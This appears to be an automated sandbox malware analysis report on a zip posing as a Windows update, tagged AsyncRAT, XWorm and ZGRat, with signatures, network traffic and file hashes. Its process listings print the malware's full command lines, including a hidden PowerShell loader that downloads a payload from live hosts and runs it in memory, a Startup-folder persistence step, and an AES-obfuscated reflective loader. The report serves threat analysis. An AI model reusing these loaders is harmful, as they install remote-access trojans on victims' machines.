Malware Analysis Report

2025-01-02 12:13

Sample ID 240419-jnprkacc56
Target 19042024_1547_windows_update.zip
SHA256 b471f3f22ac4c66fcf7419df31431552ce8f5ac8222b1398e0d1016824e95dcf
Tags
asyncrat venom clients rat xworm zgrat trojan default
score
10/10

Analysis Overview

score
10/10

SHA256

b471f3f22ac4c66fcf7419df31431552ce8f5ac8222b1398e0d1016824e95dcf

Threat Level: Known bad

The file 19042024_1547_windows_update.zip was found to be: Known bad.

Malicious Activity Summary

asyncrat venom clients rat xworm zgrat trojan default

AsyncRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

ZGRat

Detect Xworm Payload

Detect ZGRat V1

Async RAT payload

Blocklisted process makes network request

Drops startup file

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-19 07:49

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20231129-en

Max time kernel

117s

Max time network

118s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\file.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\file.ps1

Network

N/A

Files

memory/2468-4-0x000000001B670000-0x000000001B952000-memory.dmp

memory/2468-5-0x00000000029E0000-0x00000000029E8000-memory.dmp

memory/2468-6-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2468-7-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-8-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2468-9-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-11-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-10-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-12-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2468-13-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2468-14-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-15-0x0000000002C80000-0x0000000002D00000-memory.dmp

memory/2468-16-0x0000000002C80000-0x0000000002D00000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240226-en

Max time kernel

134s

Max time network

146s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.odencko/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5164 --field-trial-handle=3084,i,4016110471176367543,14287608422419064331,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 104.21.37.30:443 nanoshield.pro tcp
US 8.8.8.8:53 30.37.21.104.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrz3l0qr.w4f.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5060-9-0x000001566BC20000-0x000001566BC42000-memory.dmp

memory/5060-19-0x00007FF893D60000-0x00007FF894821000-memory.dmp

memory/5060-20-0x000001566BCB0000-0x000001566BCC0000-memory.dmp

memory/5060-21-0x000001566BCB0000-0x000001566BCC0000-memory.dmp

memory/3828-22-0x00007FF893D60000-0x00007FF894821000-memory.dmp

memory/3828-23-0x000002882A830000-0x000002882A840000-memory.dmp

memory/3828-24-0x000002882A830000-0x000002882A840000-memory.dmp

memory/5060-25-0x000001566BCB0000-0x000001566BCC0000-memory.dmp

memory/3828-26-0x000002882A830000-0x000002882A840000-memory.dmp

memory/3828-27-0x0000028810710000-0x000002881075E000-memory.dmp

memory/4352-28-0x00007FF893D60000-0x00007FF894821000-memory.dmp

memory/4352-29-0x00000262503B0000-0x00000262503C0000-memory.dmp

memory/4352-39-0x00000262503B0000-0x00000262503C0000-memory.dmp

memory/4352-40-0x00000262503B0000-0x00000262503C0000-memory.dmp

memory/4352-47-0x00007FF893D60000-0x00007FF894821000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4f83e6b9df15851d271e8fbb8d137c9d
SHA1 52a44ba02fd59791f303362bbab53451ff48932e
SHA256 d12625e429c0df81d4e9cc99d25d64e4c091c76992ef035fb9816a4b8a973fe0
SHA512 4e67a88c08e1796d4c6717a757355ca03cdb9aa594527340e6bb873fee7f97cdd5012fe53064cfdae7d89417ab4d80c71b5acc0fe733acc2273063680198b68a

memory/3828-51-0x00007FF893D60000-0x00007FF894821000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 235a8eb126d835efb2e253459ab8b089
SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

memory/5060-54-0x00007FF893D60000-0x00007FF894821000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

147s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.indabid/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 19.40.53.23.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 104.21.37.30:443 nanoshield.pro tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 30.37.21.104.in-addr.arpa udp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4ewdpxzf.is3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4360-0-0x0000016898170000-0x0000016898192000-memory.dmp

memory/4360-10-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

memory/4360-11-0x00000168967F0000-0x0000016896800000-memory.dmp

memory/4360-12-0x00000168967F0000-0x0000016896800000-memory.dmp

memory/1876-22-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

memory/1876-24-0x0000019729180000-0x0000019729190000-memory.dmp

memory/1876-23-0x0000019729180000-0x0000019729190000-memory.dmp

memory/1876-25-0x0000019710B20000-0x0000019710B6E000-memory.dmp

memory/3800-35-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

memory/3800-36-0x0000019D43030000-0x0000019D43040000-memory.dmp

memory/3800-43-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

memory/1876-44-0x0000019729180000-0x0000019729190000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 48874fdc03476cb442d506f5bb796f70
SHA1 2dedcc271d935fe842f7cb4cc03873b6f688d29d
SHA256 15717634eff02490a9e8a4606a3cc8d61876a9efa01b42d6c8bf442bcf8718e0
SHA512 31b5539304c0ad1f781407a60ff019c30192b2fe3e7bd64bf7dc3d5a9263eae6874c8ef960998900d1322d358e38f9eadba40945958fb6ff7719cd1a24644671

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 10e624ec749193e3ec4e8e73e2d74ccd
SHA1 a4200f61c224af1af1e58eec4c83623b2851729c
SHA256 ee3ab03ec8e520c50ab249e06c76761e988a674ddc4fa4bf58cf7e66c8a099a1
SHA512 cae9adc6aaf954d1f999f3c6540c0a3060e74b80b5644118c1e87c37dd47e5576cf315b58d76c0cdeb95dc9cdfb2511763f7fa6873662c47c3f8e76c8602c481

memory/1876-48-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

memory/4360-51-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

122s

Max time network

128s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2208 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2208 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2208 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2208 wrote to memory of 2200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2208 wrote to memory of 2200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2208 wrote to memory of 2200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2200 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2200 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2200 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd';$MZYP='MadRzGindRzGModdRzGuldRzGedRzG'.Replace('dRzG', ''),'ChQdTpaQdTpngQdTpeEQdTpxteQdTpnsiQdTponQdTp'.Replace('QdTp', ''),'FGJZSroGJZSmBGJZSasGJZSeGJZS6GJZS4GJZSStrGJZSinGJZSgGJZS'.Replace('GJZS', ''),'GfsYwetfsYwCfsYwurfsYwrfsYwentfsYwProfsYwcefsYwssfsYw'.Replace('fsYw', ''),'ElPbFUePbFUmPbFUenPbFUtPbFUAtPbFU'.Replace('PbFU', ''),'InvEnKDoEnKDkeEnKD'.Replace('EnKD', ''),'Decnyejomnyejprnyejenyejssnyej'.Replace('nyej', ''),'LoaCsUjdCsUj'.Replace('CsUj', ''),'SXMnypliXMnytXMny'.Replace('XMny', ''),'ReYChsadYChsLinYChsesYChs'.Replace('YChs', ''),'TraTpWrnsTpWrfoTpWrrmTpWrFinTpWralTpWrBlTpWrockTpWr'.Replace('TpWr', ''),'CrjagKeajagKtjagKeDejagKcrjagKyjagKpjagKtorjagK'.Replace('jagK', ''),'EqqjYnqqjYtryqqjYPoiqqjYntqqjY'.Replace('qqjY', ''),'CCMrToCMrTpCMrTyToCMrT'.Replace('CMrT', '');powershell -w hidden;function lezXx($vAHtD){$fMpHn=[System.Security.Cryptography.Aes]::Create();$fMpHn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fMpHn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fMpHn.Key=[System.Convert]::($MZYP[2])('Vz0NaMXoskkNfAZDSYL9QEs4+Pg8xizh89PafV/0IEc=');$fMpHn.IV=[System.Convert]::($MZYP[2])('YYQFWZml9Xmr8vgNBAedtQ==');$LBVjX=$fMpHn.($MZYP[11])();$OrsvL=$LBVjX.($MZYP[10])($vAHtD,0,$vAHtD.Length);$LBVjX.Dispose();$fMpHn.Dispose();$OrsvL;}function UqmQx($vAHtD){$YXBBI=New-Object System.IO.MemoryStream(,$vAHtD);$DXQeR=New-Object System.IO.MemoryStream;$GSEpw=New-Object System.IO.Compression.GZipStream($YXBBI,[IO.Compression.CompressionMode]::($MZYP[6]));$GSEpw.($MZYP[13])($DXQeR);$GSEpw.Dispose();$YXBBI.Dispose();$DXQeR.Dispose();$DXQeR.ToArray();}$GbEwM=[System.IO.File]::($MZYP[9])([Console]::Title);$PQord=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 5).Substring(2))));$GigRn=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 
6).Substring(2))));[System.Reflection.Assembly]::($MZYP[7])([byte[]]$GigRn).($MZYP[12]).($MZYP[5])($null,$null);[System.Reflection.Assembly]::($MZYP[7])([byte[]]$PQord).($MZYP[12]).($MZYP[5])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/2120-4-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

memory/2120-5-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/2120-7-0x0000000002460000-0x0000000002468000-memory.dmp

memory/2120-8-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/2120-6-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-9-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-10-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-11-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-12-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

memory/2120-13-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-14-0x0000000002950000-0x00000000029D0000-memory.dmp

memory/2120-15-0x0000000002950000-0x00000000029D0000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

120s

Max time network

125s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.dkmmIhF/selif/orp.dleihsonan//:sptth', '1', 'Music'))}}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 104.21.37.30:443 nanoshield.pro tcp

Files

memory/2728-4-0x000000001B590000-0x000000001B872000-memory.dmp

memory/2728-5-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

memory/2728-7-0x0000000002C90000-0x0000000002D10000-memory.dmp

memory/2728-6-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

memory/2728-8-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

memory/2728-9-0x0000000002C90000-0x0000000002D10000-memory.dmp

memory/2728-10-0x0000000002C90000-0x0000000002D10000-memory.dmp

memory/2728-11-0x0000000002C90000-0x0000000002D10000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QIMO6ZYIYLL1WREG6CI1.temp

MD5 8532661d6d819a85f21b22af4639a4ee
SHA1 27ea2be3ad7bc9deeccd32fb7e600d8cfe42a13d
SHA256 29391a67d6c631b21a16033c9d52e9ec0163800893423099d3b0ebb321a59341
SHA512 0f0fd2af39d76c5f13618146e59955fbcb1a25e7c18c3d22ccb2aceb5668ded4c66286837f6aaa428cd27b96e1e6b8ad45cd074346eb5881240cb4ac630fb3ef

memory/2388-17-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

memory/2388-18-0x0000000002D80000-0x0000000002E00000-memory.dmp

memory/2388-19-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

memory/2388-21-0x0000000002D80000-0x0000000002E00000-memory.dmp

